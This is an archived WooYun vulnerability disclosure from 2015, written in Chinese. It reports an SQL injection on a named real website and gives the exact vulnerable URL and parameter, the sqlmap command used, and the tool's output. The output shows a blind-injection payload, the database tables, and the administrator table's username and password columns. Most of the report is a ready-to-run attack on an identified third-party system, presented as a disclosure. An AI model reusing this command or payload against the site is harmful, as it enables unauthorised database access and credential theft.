乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 细节已通知厂商并且等待厂商处理中 2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开
脚本之家某站存在SQL注入的漏洞
脚本之家某站存在SQL注入的漏洞地址:http://idc.jb51.net注入地址:http://idc.jb51.net/style/info/newview.asp?id=317使用sqlmap 跑
<python sqlmap.py -u "http://idc.jb51.net/style/info/newview.asp?id=317" --tables/code><code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=318 AND 2814=2814---[22:33:23] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[4 tables]+---------------+| administrator || article || feedback || links |+---------------+Database: Microsoft_Access_masterdbTable: administrator[6 columns]+----------+-------------+| Column | Type |+----------+-------------+| author | non-numeric || classid | numeric || id | numeric || keyword | non-numeric || username | non-numeric || userpwd | non-numeric |+----------+-------------+
好了就这些咯
过滤咯
危害等级:无影响厂商忽略
忽略时间:2015-07-26 12:26
漏洞Rank:4 (WooYun评价)
暂无